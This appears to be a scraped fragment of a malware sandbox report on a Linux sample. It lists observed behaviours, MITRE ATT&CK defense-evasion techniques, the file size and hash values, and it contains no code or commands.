- Enumerates active TCP sockets
- Writes file to system bin folder
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1643
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
MD571b0c2e7cc122d6de4a481bea5ebc6d9
SHA1f982ae244188ddd93b797e9548e049b97d2f2c7f
SHA256de0eaed88adb239921c42f1f8038523d53c735f01992fe773f54e1d181750833
SHA512f38ed5895d7c420b15688de521df6fc394ae9e1690a5f3628f22bd6489dab21ec8e9fa6dcfca40082d5099763d10b680bba3b43ef6f71016132958aa9a0d7f43